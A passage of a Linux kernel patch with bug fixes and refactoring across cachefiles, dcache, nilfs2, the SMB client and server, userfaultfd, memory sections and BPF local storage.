+@@ -535,7 +548,8 @@ static int cachefiles_ondemand_send_req(struct cachefiles_object *object,
+ 	 * If error occurs after creating the anonymous fd,
+ 	 * cachefiles_ondemand_fd_release() will set object to close.
+ 	 */
+-	if (opcode == CACHEFILES_OP_OPEN)
++	if (opcode == CACHEFILES_OP_OPEN &&
++	    !cachefiles_ondemand_object_is_dropping(object))
+ 		cachefiles_ondemand_set_object_close(object);
+ 	kfree(req);
+ 	return ret;
+@@ -634,8 +648,34 @@ int cachefiles_ondemand_init_object(struct cachefiles_object *object)
+ 
+ void cachefiles_ondemand_clean_object(struct cachefiles_object *object)
+ {
++	unsigned long index;
++	struct cachefiles_req *req;
++	struct cachefiles_cache *cache;
++
++	if (!object->ondemand)
++		return;
++
+ 	cachefiles_ondemand_send_req(object, CACHEFILES_OP_CLOSE, 0,
+ 			cachefiles_ondemand_init_close_req, NULL);
++
++	if (!object->ondemand->ondemand_id)
++		return;
++
++	/* Cancel all requests for the object that is being dropped. */
++	cache = object->volume->cache;
++	xa_lock(&cache->reqs);
++	cachefiles_ondemand_set_object_dropping(object);
++	xa_for_each(&cache->reqs, index, req) {
++		if (req->object == object) {
++			req->error = -EIO;
++			complete(&req->done);
++			__xa_erase(&cache->reqs, index);
++		}
++	}
++	xa_unlock(&cache->reqs);
++
++	/* Wait for ondemand_object_worker() to finish to avoid UAF. */
++	cancel_work_sync(&object->ondemand->ondemand_work);
+ }
+ 
+ int cachefiles_ondemand_init_obj_info(struct cachefiles_object *object,
+diff --git a/fs/cachefiles/xattr.c b/fs/cachefiles/xattr.c
+index 00b087c14995a..0ecfc9065047c 100644
+--- a/fs/cachefiles/xattr.c
++++ b/fs/cachefiles/xattr.c
+@@ -110,9 +110,11 @@ int cachefiles_check_auxdata(struct cachefiles_object *object, struct file *file
+ 	if (xlen == 0)
+ 		xlen = vfs_getxattr(&init_user_ns, dentry, cachefiles_xattr_cache, buf, tlen);
+ 	if (xlen != tlen) {
+-		if (xlen < 0)
++		if (xlen < 0) {
++			ret = xlen;
+ 			trace_cachefiles_vfs_error(object, file_inode(file), xlen,
+ 						   cachefiles_trace_getxattr_error);
++		}
+ 		if (xlen == -EIO)
+ 			cachefiles_io_error_obj(
+ 				object,
+@@ -252,6 +254,7 @@ int cachefiles_check_volume_xattr(struct cachefiles_volume *volume)
+ 		xlen = vfs_getxattr(&init_user_ns, dentry, cachefiles_xattr_cache, buf, len);
+ 	if (xlen != len) {
+ 		if (xlen < 0) {
++			ret = xlen;
+ 			trace_cachefiles_vfs_error(NULL, d_inode(dentry), xlen,
+ 						   cachefiles_trace_getxattr_error);
+ 			if (xlen == -EIO)
+diff --git a/fs/dcache.c b/fs/dcache.c
+index b09bc88dbbec7..04f32dc8d1ad8 100644
+--- a/fs/dcache.c
++++ b/fs/dcache.c
+@@ -356,7 +356,11 @@ static inline void __d_clear_type_and_inode(struct dentry *dentry)
+ 	flags &= ~(DCACHE_ENTRY_TYPE | DCACHE_FALLTHRU);
+ 	WRITE_ONCE(dentry->d_flags, flags);
+ 	dentry->d_inode = NULL;
+-	if (dentry->d_flags & DCACHE_LRU_LIST)
++	/*
++	 * The negative counter only tracks dentries on the LRU. Don't inc if
++	 * d_lru is on another list.
++	 */
++	if ((flags & (DCACHE_LRU_LIST|DCACHE_SHRINK_LIST)) == DCACHE_LRU_LIST)
+ 		this_cpu_inc(nr_dentry_negative);
+ }
+ 
+@@ -2001,9 +2005,11 @@ static void __d_instantiate(struct dentry *dentry, struct inode *inode)
+ 
+ 	spin_lock(&dentry->d_lock);
+ 	/*
+-	 * Decrement negative dentry count if it was in the LRU list.
++	 * The negative counter only tracks dentries on the LRU. Don't dec if
++	 * d_lru is on another list.
+ 	 */
+-	if (dentry->d_flags & DCACHE_LRU_LIST)
++	if ((dentry->d_flags &
++	     (DCACHE_LRU_LIST|DCACHE_SHRINK_LIST)) == DCACHE_LRU_LIST)
+ 		this_cpu_dec(nr_dentry_negative);
+ 	hlist_add_head(&dentry->d_u.d_alias, &inode->i_dentry);
+ 	raw_write_seqcount_begin(&dentry->d_seq);
+diff --git a/fs/locks.c b/fs/locks.c
+index 7d0918b8fe5d6..c23bcfe9b0fdd 100644
+--- a/fs/locks.c
++++ b/fs/locks.c
+@@ -1298,9 +1298,9 @@ static int posix_lock_inode(struct inode *inode, struct file_lock *request,
+ 		locks_wake_up_blocks(left);
+ 	}
+  out:
++	trace_posix_lock_inode(inode, request, error);
+ 	spin_unlock(&ctx->flc_lock);
+ 	percpu_up_read(&file_rwsem);
+-	trace_posix_lock_inode(inode, request, error);
+ 	/*
+ 	 * Free any unused locks.
+ 	 */
+diff --git a/fs/nilfs2/dir.c b/fs/nilfs2/dir.c
+index 4bba1970ad333..36438834a0c73 100644
+--- a/fs/nilfs2/dir.c
++++ b/fs/nilfs2/dir.c
+@@ -396,11 +396,39 @@ nilfs_find_entry(struct inode *dir, const struct qstr *qstr,
+ 
+ struct nilfs_dir_entry *nilfs_dotdot(struct inode *dir, struct page **p)
+ {
+-	struct nilfs_dir_entry *de = nilfs_get_page(dir, 0, p);
++	struct page *page;
++	struct nilfs_dir_entry *de, *next_de;
++	size_t limit;
++	char *msg;
+ 
++	de = nilfs_get_page(dir, 0, &page);
+ 	if (IS_ERR(de))
+ 		return NULL;
+-	return nilfs_next_entry(de);
++
++	limit = nilfs_last_byte(dir, 0);  /* is a multiple of chunk size */
++	if (unlikely(!limit || le64_to_cpu(de->inode) != dir->i_ino ||
++		     !nilfs_match(1, ".", de))) {
++		msg = "missing '.'";
++		goto fail;
++	}
++
++	next_de = nilfs_next_entry(de);
++	/*
++	 * If "next_de" has not reached the end of the chunk, there is
++	 * at least one more record.  Check whether it matches "..".
++	 */
++	if (unlikely((char *)next_de == (char *)de + nilfs_chunk_size(dir) ||
++		     !nilfs_match(2, "..", next_de))) {
++		msg = "missing '..'";
++		goto fail;
++	}
++	*p = page;
++	return next_de;
++
++fail:
++	nilfs_error(dir->i_sb, "directory #%lu %s", dir->i_ino, msg);
++	nilfs_put_page(page);
++	return NULL;
+ }
+ 
+ ino_t nilfs_inode_by_name(struct inode *dir, const struct qstr *qstr)
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index e5a72f9c793ef..1564febd1439f 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -1837,8 +1837,8 @@ require use of the stronger protocol */
+ #define   CIFSSEC_MUST_SEAL	0x40040 /* not supported yet */
+ #define   CIFSSEC_MUST_NTLMSSP	0x80080 /* raw ntlmssp with ntlmv2 */
+ 
+-#define   CIFSSEC_DEF (CIFSSEC_MAY_SIGN | CIFSSEC_MAY_NTLMV2 | CIFSSEC_MAY_NTLMSSP)
+-#define   CIFSSEC_MAX (CIFSSEC_MUST_NTLMV2)
++#define   CIFSSEC_DEF (CIFSSEC_MAY_SIGN | CIFSSEC_MAY_NTLMV2 | CIFSSEC_MAY_NTLMSSP | CIFSSEC_MAY_SEAL)
++#define   CIFSSEC_MAX (CIFSSEC_MAY_SIGN | CIFSSEC_MUST_KRB5 | CIFSSEC_MAY_SEAL)
+ #define   CIFSSEC_AUTH_MASK (CIFSSEC_MAY_NTLMV2 | CIFSSEC_MAY_KRB5 | CIFSSEC_MAY_NTLMSSP)
+ /*
+  *****************************************************************
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 34d88425434ab..6344bc81736c0 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -2062,15 +2062,22 @@ int smb2_tree_connect(struct ksmbd_work *work)
+  * @access:		file access flags
+  * @disposition:	file disposition flags
+  * @may_flags:		set with MAY_ flags
++ * @is_dir:		is creating open flags for directory
+  *
+  * Return:      file open flags
+  */
+ static int smb2_create_open_flags(bool file_present, __le32 access,
+ 				  __le32 disposition,
+-				  int *may_flags)
++				  int *may_flags,
++				  bool is_dir)
+ {
+ 	int oflags = O_NONBLOCK | O_LARGEFILE;
+ 
++	if (is_dir) {
++		access &= ~FILE_WRITE_DESIRE_ACCESS_LE;
++		ksmbd_debug(SMB, "Discard write access to a directory\n");
++	}
++
+ 	if (access & FILE_READ_DESIRED_ACCESS_LE &&
+ 	    access & FILE_WRITE_DESIRE_ACCESS_LE) {
+ 		oflags |= O_RDWR;
+@@ -2983,7 +2990,9 @@ int smb2_open(struct ksmbd_work *work)
+ 
+ 	open_flags = smb2_create_open_flags(file_present, daccess,
+ 					    req->CreateDisposition,
+-					    &may_flags);
++					    &may_flags,
++		req->CreateOptions & FILE_DIRECTORY_FILE_LE ||
++		(file_present && S_ISDIR(d_inode(path.dentry)->i_mode)));
+ 
+ 	if (!test_tree_conn_flag(tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+ 		if (open_flags & (O_CREAT | O_TRUNC)) {
+diff --git a/fs/userfaultfd.c b/fs/userfaultfd.c
+index 154c103eca751..82101a2cf933e 100644
+--- a/fs/userfaultfd.c
++++ b/fs/userfaultfd.c
+@@ -1968,7 +1968,7 @@ static int userfaultfd_api(struct userfaultfd_ctx *ctx,
+ 		goto out;
+ 	features = uffdio_api.features;
+ 	ret = -EINVAL;
+-	if (uffdio_api.api != UFFD_API || (features & ~UFFD_API_FEATURES))
++	if (uffdio_api.api != UFFD_API)
+ 		goto err_out;
+ 	ret = -EPERM;
+ 	if ((features & UFFD_FEATURE_EVENT_FORK) && !capable(CAP_SYS_PTRACE))
+@@ -1985,6 +1985,11 @@ static int userfaultfd_api(struct userfaultfd_ctx *ctx,
+ #ifndef CONFIG_PTE_MARKER_UFFD_WP
+ 	uffdio_api.features &= ~UFFD_FEATURE_WP_HUGETLBFS_SHMEM;
+ #endif
++
++	ret = -EINVAL;
++	if (features & ~uffdio_api.features)
++		goto err_out;
++
+ 	uffdio_api.ioctls = UFFD_API_IOCTLS;
+ 	ret = -EFAULT;
+ 	if (copy_to_user(buf, &uffdio_api, sizeof(uffdio_api)))
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index 1ca1902af23e9..6b18b8da025f9 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -1777,6 +1777,8 @@ struct bpf_prog *bpf_prog_get_curr_or_next(u32 *id);
+ void *bpf_map_kmalloc_node(const struct bpf_map *map, size_t size, gfp_t flags,
+ 			   int node);
+ void *bpf_map_kzalloc(const struct bpf_map *map, size_t size, gfp_t flags);
++void *bpf_map_kvcalloc(struct bpf_map *map, size_t n, size_t size,
++		       gfp_t flags);
+ void __percpu *bpf_map_alloc_percpu(const struct bpf_map *map, size_t size,
+ 				    size_t align, gfp_t flags);
+ #else
+@@ -1793,6 +1795,12 @@ bpf_map_kzalloc(const struct bpf_map *map, size_t size, gfp_t flags)
+ 	return kzalloc(size, flags);
+ }
+ 
++static inline void *
++bpf_map_kvcalloc(struct bpf_map *map, size_t n, size_t size, gfp_t flags)
++{
++	return kvcalloc(n, size, flags);
++}
++
+ static inline void __percpu *
+ bpf_map_alloc_percpu(const struct bpf_map *map, size_t size, size_t align,
+ 		     gfp_t flags)
+diff --git a/include/linux/bpf_local_storage.h b/include/linux/bpf_local_storage.h
+index 7ea18d4da84b8..6d37a40cd90e8 100644
+--- a/include/linux/bpf_local_storage.h
++++ b/include/linux/bpf_local_storage.h
+@@ -116,21 +116,22 @@ static struct bpf_local_storage_cache name = {			\
+ 	.idx_lock = __SPIN_LOCK_UNLOCKED(name.idx_lock),	\
+ }
+ 
+-u16 bpf_local_storage_cache_idx_get(struct bpf_local_storage_cache *cache);
+-void bpf_local_storage_cache_idx_free(struct bpf_local_storage_cache *cache,
+-				      u16 idx);
+-
+ /* Helper functions for bpf_local_storage */
+ int bpf_local_storage_map_alloc_check(union bpf_attr *attr);
+ 
+-struct bpf_local_storage_map *bpf_local_storage_map_alloc(union bpf_attr *attr);
++struct bpf_map *
++bpf_local_storage_map_alloc(union bpf_attr *attr,
++			    struct bpf_local_storage_cache *cache);
+ 
+ struct bpf_local_storage_data *
+ bpf_local_storage_lookup(struct bpf_local_storage *local_storage,
+ 			 struct bpf_local_storage_map *smap,
+ 			 bool cacheit_lockit);
+ 
+-void bpf_local_storage_map_free(struct bpf_local_storage_map *smap,
++bool bpf_local_storage_unlink_nolock(struct bpf_local_storage *local_storage);
++
++void bpf_local_storage_map_free(struct bpf_map *map,
++				struct bpf_local_storage_cache *cache,
+ 				int __percpu *busy_counter);
+ 
+ int bpf_local_storage_map_check_btf(const struct bpf_map *map,
+@@ -141,10 +142,6 @@ int bpf_local_storage_map_check_btf(const struct bpf_map *map,
+ void bpf_selem_link_storage_nolock(struct bpf_local_storage *local_storage,
+ 				   struct bpf_local_storage_elem *selem);
+ 
+-bool bpf_selem_unlink_storage_nolock(struct bpf_local_storage *local_storage,
+-				     struct bpf_local_storage_elem *selem,
+-				     bool uncharge_omem, bool use_trace_rcu);
+-
+ void bpf_selem_unlink(struct bpf_local_storage_elem *selem, bool use_trace_rcu);
+ 
+ void bpf_selem_link_map(struct bpf_local_storage_map *smap,
+diff --git a/include/linux/compiler_attributes.h b/include/linux/compiler_attributes.h
+index ae4c9579ca5f0..efe5e8067652b 100644
+--- a/include/linux/compiler_attributes.h
++++ b/include/linux/compiler_attributes.h
+@@ -321,6 +321,18 @@
+  */
+ #define __section(section)              __attribute__((__section__(section)))
+ 
++/*
++ * Optional: only supported since gcc >= 12
++ *
++ *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Common-Variable-Attributes.html#index-uninitialized-variable-attribute
++ * clang: https://clang.llvm.org/docs/AttributeReference.html#uninitialized
++ */
++#if __has_attribute(__uninitialized__)
++# define __uninitialized		__attribute__((__uninitialized__))
++#else
++# define __uninitialized
++#endif
++
+ /*
+  *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Common-Function-Attributes.html#index-unused-function-attribute
+  *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Common-Type-Attributes.html#index-unused-type-attribute
+diff --git a/include/linux/mmzone.h b/include/linux/mmzone.h
+index 93d2003091222..61906244c14d6 100644
+--- a/include/linux/mmzone.h
++++ b/include/linux/mmzone.h
+@@ -1814,8 +1814,9 @@ static inline int subsection_map_index(unsigned long pfn)
+ static inline int pfn_section_valid(struct mem_section *ms, unsigned long pfn)
+ {
+ 	int idx = subsection_map_index(pfn);
++	struct mem_section_usage *usage = READ_ONCE(ms->usage);
+ 
+-	return test_bit(idx, READ_ONCE(ms->usage)->subsection_map);
++	return usage ? test_bit(idx, usage->subsection_map) : 0;
+ }
+ #else
+ static inline int pfn_section_valid(struct mem_section *ms, unsigned long pfn)
+diff --git a/kernel/bpf/bpf_inode_storage.c b/kernel/bpf/bpf_inode_storage.c
+index 5f7683b191998..6a1d4d22816a3 100644
+--- a/kernel/bpf/bpf_inode_storage.c
++++ b/kernel/bpf/bpf_inode_storage.c
+@@ -56,11 +56,9 @@ static struct bpf_local_storage_data *inode_storage_lookup(struct inode *inode,
+ 
+ void bpf_inode_storage_free(struct inode *inode)
+ {
+-	struct bpf_local_storage_elem *selem;
+ 	struct bpf_local_storage *local_storage;
+ 	bool free_inode_storage = false;
+ 	struct bpf_storage_blob *bsb;
+-	struct hlist_node *n;
+ 
+ 	bsb = bpf_inode(inode);
+ 	if (!bsb)
+@@ -74,30 +72,11 @@ void bpf_inode_storage_free(struct inode *inode)
+ 		return;
+ 	}
+ 
+-	/* Neither the bpf_prog nor the bpf-map's syscall
+-	 * could be modifying the local_storage->list now.
+-	 * Thus, no elem can be added-to or deleted-from the
+-	 * local_storage->list by the bpf_prog or by the bpf-map's syscall.
+-	 *
+-	 * It is racing with bpf_local_storage_map_free() alone
+-	 * when unlinking elem from the local_storage->list and
+-	 * the map's bucket->list.
+-	 */
+ 	raw_spin_lock_bh(&local_storage->lock);
+-	hlist_for_each_entry_safe(selem, n, &local_storage->list, snode) {
+-		/* Always unlink from map before unlinking from
+-		 * local_storage.
+-		 */
+-		bpf_selem_unlink_map(selem);
+-		free_inode_storage = bpf_selem_unlink_storage_nolock(
+-			local_storage, selem, false, false);
+-	}
++	free_inode_storage = bpf_local_storage_unlink_nolock(local_storage);
+ 	raw_spin_unlock_bh(&local_storage->lock);
+ 	rcu_read_unlock();
+ 
+-	/* free_inoode_storage should always be true as long as
+-	 * local_storage->list was non-empty.
+-	 */
+ 	if (free_inode_storage)
+ 		kfree_rcu(local_storage, rcu);
+ }
+@@ -226,23 +205,12 @@ static int notsupp_get_next_key(struct bpf_map *map, void *key,
+ 
+ static struct bpf_map *inode_storage_map_alloc(union bpf_attr *attr)
+ {
+-	struct bpf_local_storage_map *smap;
+-
+-	smap = bpf_local_storage_map_alloc(attr);
+-	if (IS_ERR(smap))
+-		return ERR_CAST(smap);
+-
+-	smap->cache_idx = bpf_local_storage_cache_idx_get(&inode_cache);
+-	return &smap->map;
++	return bpf_local_storage_map_alloc(attr, &inode_cache);
+ }
+ 
+ static void inode_storage_map_free(struct bpf_map *map)
+ {
+-	struct bpf_local_storage_map *smap;
+-
+-	smap = (struct bpf_local_storage_map *)map;
+-	bpf_local_storage_cache_idx_free(&inode_cache, smap->cache_idx);
+-	bpf_local_storage_map_free(smap, NULL);
++	bpf_local_storage_map_free(map, &inode_cache, NULL);
+ }
+ 
+ BTF_ID_LIST_SINGLE(inode_storage_map_btf_ids, struct,
+diff --git a/kernel/bpf/bpf_local_storage.c b/kernel/bpf/bpf_local_storage.c
+index d9d88a2cda5e5..51a9f024c1829 100644
+--- a/kernel/bpf/bpf_local_storage.c
++++ b/kernel/bpf/bpf_local_storage.c
+@@ -114,9 +114,9 @@ static void bpf_selem_free_rcu(struct rcu_head *rcu)
+  * The caller must ensure selem->smap is still valid to be
+  * dereferenced for its smap->elem_size and smap->cache_idx.
+  */
+-bool bpf_selem_unlink_storage_nolock(struct bpf_local_storage *local_storage,
+-				     struct bpf_local_storage_elem *selem,
+-				     bool uncharge_mem, bool use_trace_rcu)
++static bool bpf_selem_unlink_storage_nolock(struct bpf_local_storage *local_storage,
++					    struct bpf_local_storage_elem *selem,
++					    bool uncharge_mem, bool use_trace_rcu)
+ {
+ 	struct bpf_local_storage_map *smap;
+ 	bool free_local_storage;
+@@ -501,7 +501,7 @@ bpf_local_storage_update(void *owner, struct bpf_local_storage_map *smap,
+ 	return ERR_PTR(err);
+ }
+ 
+-u16 bpf_local_storage_cache_idx_get(struct bpf_local_storage_cache *cache)
++static u16 bpf_local_storage_cache_idx_get(struct bpf_local_storage_cache *cache)
+ {
+ 	u64 min_usage = U64_MAX;
+ 	u16 i, res = 0;
+@@ -525,21 +525,132 @@ u16 bpf_local_storage_cache_idx_get(struct bpf_local_storage_cache *cache)
+ 	return res;
+ }
+ 
+-void bpf_local_storage_cache_idx_free(struct bpf_local_storage_cache *cache,
+-				      u16 idx)
++static void bpf_local_storage_cache_idx_free(struct bpf_local_storage_cache *cache,
++					     u16 idx)
+ {
+ 	spin_lock(&cache->idx_lock);
+ 	cache->idx_usage_counts[idx]--;
+ 	spin_unlock(&cache->idx_lock);
+ }
+ 
+-void bpf_local_storage_map_free(struct bpf_local_storage_map *smap,
+-				int __percpu *busy_counter)
++int bpf_local_storage_map_alloc_check(union bpf_attr *attr)
++{
++	if (attr->map_flags & ~BPF_LOCAL_STORAGE_CREATE_FLAG_MASK ||
++	    !(attr->map_flags & BPF_F_NO_PREALLOC) ||
++	    attr->max_entries ||
++	    attr->key_size != sizeof(int) || !attr->value_size ||
++	    /* Enforce BTF for userspace sk dumping */
++	    !attr->btf_key_type_id || !attr->btf_value_type_id)
++		return -EINVAL;
++
++	if (!bpf_capable())
++		return -EPERM;
++
++	if (attr->value_size > BPF_LOCAL_STORAGE_MAX_VALUE_SIZE)
++		return -E2BIG;
++
++	return 0;
++}
++
++int bpf_local_storage_map_check_btf(const struct bpf_map *map,
++				    const struct btf *btf,
++				    const struct btf_type *key_type,
++				    const struct btf_type *value_type)
++{
++	u32 int_data;
++
++	if (BTF_INFO_KIND(key_type->info) != BTF_KIND_INT)
++		return -EINVAL;
++
++	int_data = *(u32 *)(key_type + 1);
++	if (BTF_INT_BITS(int_data) != 32 || BTF_INT_OFFSET(int_data))
++		return -EINVAL;
++
++	return 0;
++}
++
++bool bpf_local_storage_unlink_nolock(struct bpf_local_storage *local_storage)
+ {
+ 	struct bpf_local_storage_elem *selem;
++	bool free_storage = false;
++	struct hlist_node *n;
++
++	/* Neither the bpf_prog nor the bpf_map's syscall
++	 * could be modifying the local_storage->list now.
++	 * Thus, no elem can be added to or deleted from the
++	 * local_storage->list by the bpf_prog or by the bpf_map's syscall.
++	 *
++	 * It is racing with bpf_local_storage_map_free() alone
++	 * when unlinking elem from the local_storage->list and
++	 * the map's bucket->list.
++	 */
++	hlist_for_each_entry_safe(selem, n, &local_storage->list, snode) {
++		/* Always unlink from map before unlinking from
++		 * local_storage.
++		 */
++		bpf_selem_unlink_map(selem);
++		/* If local_storage list has only one element, the
++		 * bpf_selem_unlink_storage_nolock() will return true.
++		 * Otherwise, it will return false. The current loop iteration
++		 * intends to remove all local storage. So the last iteration
++		 * of the loop will set the free_cgroup_storage to true.
++		 */
++		free_storage = bpf_selem_unlink_storage_nolock(
++			local_storage, selem, false, false);
++	}
++
++	return free_storage;
++}
++
++struct bpf_map *
++bpf_local_storage_map_alloc(union bpf_attr *attr,
++			    struct bpf_local_storage_cache *cache)
++{
++	struct bpf_local_storage_map *smap;
++	unsigned int i;
++	u32 nbuckets;
++
++	smap = bpf_map_area_alloc(sizeof(*smap), NUMA_NO_NODE);
++	if (!smap)
++		return ERR_PTR(-ENOMEM);
++	bpf_map_init_from_attr(&smap->map, attr);
++
++	nbuckets = roundup_pow_of_two(num_possible_cpus());
++	/* Use at least 2 buckets, select_bucket() is undefined behavior with 1 bucket */
++	nbuckets = max_t(u32, 2, nbuckets);
++	smap->bucket_log = ilog2(nbuckets);
++
++	smap->buckets = bpf_map_kvcalloc(&smap->map, nbuckets,
++					 sizeof(*smap->buckets), GFP_USER | __GFP_NOWARN);
++	if (!smap->buckets) {
++		bpf_map_area_free(smap);
++		return ERR_PTR(-ENOMEM);
++	}
++
++	for (i = 0; i < nbuckets; i++) {
++		INIT_HLIST_HEAD(&smap->buckets[i].list);
++		raw_spin_lock_init(&smap->buckets[i].lock);
++	}
++
++	smap->elem_size = offsetof(struct bpf_local_storage_elem,
++				   sdata.data[attr->value_size]);
++
++	smap->cache_idx = bpf_local_storage_cache_idx_get(cache);
++	return &smap->map;
++}
++
++void bpf_local_storage_map_free(struct bpf_map *map,
++				struct bpf_local_storage_cache *cache,
++				int __percpu *busy_counter)
++{
+ 	struct bpf_local_storage_map_bucket *b;
++	struct bpf_local_storage_elem *selem;
++	struct bpf_local_storage_map *smap;
+ 	unsigned int i;
+ 
++	smap = (struct bpf_local_storage_map *)map;
++	bpf_local_storage_cache_idx_free(cache, smap->cache_idx);
++
+ 	/* Note that this map might be concurrently cloned from
+ 	 * bpf_sk_storage_clone. Wait for any existing bpf_sk_storage_clone
+ 	 * RCU read section to finish before proceeding. New RCU
+@@ -594,73 +705,3 @@ void bpf_local_storage_map_free(struct bpf_local_storage_map *smap,
+ 	kvfree(smap->buckets);
+ 	bpf_map_area_free(smap);
+ }
+-
+-int bpf_local_storage_map_alloc_check(union bpf_attr *attr)
+-{
+-	if (attr->map_flags & ~BPF_LOCAL_STORAGE_CREATE_FLAG_MASK ||
+-	    !(attr->map_flags & BPF_F_NO_PREALLOC) ||
+-	    attr->max_entries ||
+-	    attr->key_size != sizeof(int) || !attr->value_size ||
+-	    /* Enforce BTF for userspace sk dumping */
+-	    !attr->btf_key_type_id || !attr->btf_value_type_id)
+-		return -EINVAL;
+-
+-	if (!bpf_capable())
+-		return -EPERM;
+-
+-	if (attr->value_size > BPF_LOCAL_STORAGE_MAX_VALUE_SIZE)
+-		return -E2BIG;
+-
+-	return 0;
+-}
+-
+-struct bpf_local_storage_map *bpf_local_storage_map_alloc(union bpf_attr *attr)
+-{
+-	struct bpf_local_storage_map *smap;
+-	unsigned int i;
+-	u32 nbuckets;
+-
+-	smap = bpf_map_area_alloc(sizeof(*smap), NUMA_NO_NODE);
+-	if (!smap)
+-		return ERR_PTR(-ENOMEM);
+-	bpf_map_init_from_attr(&smap->map, attr);
+-
+-	nbuckets = roundup_pow_of_two(num_possible_cpus());
+-	/* Use at least 2 buckets, select_bucket() is undefined behavior with 1 bucket */
+-	nbuckets = max_t(u32, 2, nbuckets);
+-	smap->bucket_log = ilog2(nbuckets);
+-
+-	smap->buckets = kvcalloc(sizeof(*smap->buckets), nbuckets,
+-				 GFP_USER | __GFP_NOWARN | __GFP_ACCOUNT);
+-	if (!smap->buckets) {
+-		bpf_map_area_free(smap);
+-		return ERR_PTR(-ENOMEM);
+-	}
+-
+-	for (i = 0; i < nbuckets; i++) {
+-		INIT_HLIST_HEAD(&smap->buckets[i].list);
+-		raw_spin_lock_init(&smap->buckets[i].lock);
+-	}
+-
+-	smap->elem_size =
+-		sizeof(struct bpf_local_storage_elem) + attr->value_size;
+-
+-	return smap;
+-}
+-
+-int bpf_local_storage_map_check_btf(const struct bpf_map *map,
+-				    const struct btf *btf,
+-				    const struct btf_type *key_type,
+-				    const struct btf_type *value_type)
+-{
+-	u32 int_data;
+-
+-	if (BTF_INFO_KIND(key_type->info) != BTF_KIND_INT)
+-		return -EINVAL;
+-
+-	int_data = *(u32 *)(key_type + 1);
+-	if (BTF_INT_BITS(int_data) != 32 || BTF_INT_OFFSET(int_data))
+-		return -EINVAL;
+-
+-	return 0;
+-}
+diff --git a/kernel/bpf/bpf_task_storage.c b/kernel/bpf/bpf_task_storage.c
+index 6f290623347e0..40a92edd6f539 100644
+--- a/kernel/bpf/bpf_task_storage.c
++++ b/kernel/bpf/bpf_task_storage.c
+@@ -71,10 +71,8 @@ task_storage_lookup(struct task_struct *task, struct bpf_map *map,
+ 
+ void bpf_task_storage_free(struct task_struct *task)
+ {
+-	struct bpf_local_storage_elem *selem;
+ 	struct bpf_local_storage *local_storage;
+ 	bool free_task_storage = false;
+-	struct hlist_node *n;
+ 	unsigned long flags;
+ 
+ 	rcu_read_lock();
+@@ -85,32 +83,13 @@ void bpf_task_storage_free(struct task_struct *task)
+ 		return;
+ 	}
+ 
+-	/* Neither the bpf_prog nor the bpf-map's syscall
+-	 * could be modifying the local_storage->list now.
+-	 * Thus, no elem can be added-to or deleted-from the
+-	 * local_storage->list by the bpf_prog or by the bpf-map's syscall.
+-	 *
+-	 * It is racing with bpf_local_storage_map_free() alone
+-	 * when unlinking elem from the local_storage->list and
+-	 * the map's bucket->list.
+-	 */
+ 	bpf_task_storage_lock();
+ 	raw_spin_lock_irqsave(&local_storage->lock, flags);
+-	hlist_for_each_entry_safe(selem, n, &local_storage->list, snode) {
+-		/* Always unlink from map before unlinking from
+-		 * local_storage.
+-		 */
+-		bpf_selem_unlink_map(selem);
+-		free_task_storage = bpf_selem_unlink_storage_nolock(
+-			local_storage, selem, false, false);
+-	}
++	free_task_storage = bpf_local_storage_unlink_nolock(local_storage);
+ 	raw_spin_unlock_irqrestore(&local_storage->lock, flags);
+ 	bpf_task_storage_unlock();
+ 	rcu_read_unlock();
+ 
+-	/* free_task_storage should always be true as long as
+-	 * local_storage->list was non-empty.
+-	 */
+ 	if (free_task_storage)
+ 		kfree_rcu(local_storage, rcu);
+ }
+@@ -288,23 +267,12 @@ static int notsupp_get_next_key(struct bpf_map *map, void *key, void *next_key)
+ 
+ static struct bpf_map *task_storage_map_alloc(union bpf_attr *attr)
+ {
+-	struct bpf_local_storage_map *smap;
+-
+-	smap = bpf_local_storage_map_alloc(attr);
+-	if (IS_ERR(smap))
+-		return ERR_CAST(smap);
+-
+-	smap->cache_idx = bpf_local_storage_cache_idx_get(&task_cache);
+-	return &smap->map;
++	return bpf_local_storage_map_alloc(attr, &task_cache);
+ }
+ 
+ static void task_storage_map_free(struct bpf_map *map)
+ {
+-	struct bpf_local_storage_map *smap;
+-
+-	smap = (struct bpf_local_storage_map *)map;
+-	bpf_local_storage_cache_idx_free(&task_cache, smap->cache_idx);
+-	bpf_local_storage_map_free(smap, &bpf_task_storage_busy);
++	bpf_local_storage_map_free(map, &task_cache, &bpf_task_storage_busy);
+ }
+ 
+ BTF_ID_LIST_SINGLE(task_storage_map_btf_ids, struct, bpf_local_storage_map)
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index 1e46a84694b8a..d77597daa0022 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -470,6 +470,21 @@ void *bpf_map_kzalloc(const struct bpf_map *map, size_t size, gfp_t flags)
+ 	return ptr;
+ }
+ 
++void *bpf_map_kvcalloc(struct bpf_map *map, size_t n, size_t size,
++		       gfp_t flags)
++{
++	struct mem_cgroup *memcg, *old_memcg;
++	void *ptr;
++
++	memcg = bpf_map_get_memcg(map);
++	old_memcg = set_active_memcg(memcg);
++	ptr = kvcalloc(n, size, flags | __GFP_ACCOUNT);
++	set_active_memcg(old_memcg);
++	mem_cgroup_put(memcg);
++
++	return ptr;
++}
++
+ void __percpu *bpf_map_alloc_percpu(const struct bpf_map *map, size_t size,
+ 				    size_t align, gfp_t flags)
+ {
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 56a5c8beb553d..8973d3c9597ce 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -3599,6 +3599,8 @@ static int check_stack_read_fixed_off(struct bpf_verifier_env *env,
+ 						continue;
+ 					if (type == STACK_MISC)
+ 						continue;
++					if (type == STACK_INVALID && env->allow_uninit_stack)
++						continue;
+ 					verbose(env, "invalid read from stack off %d+%d size %d\n",
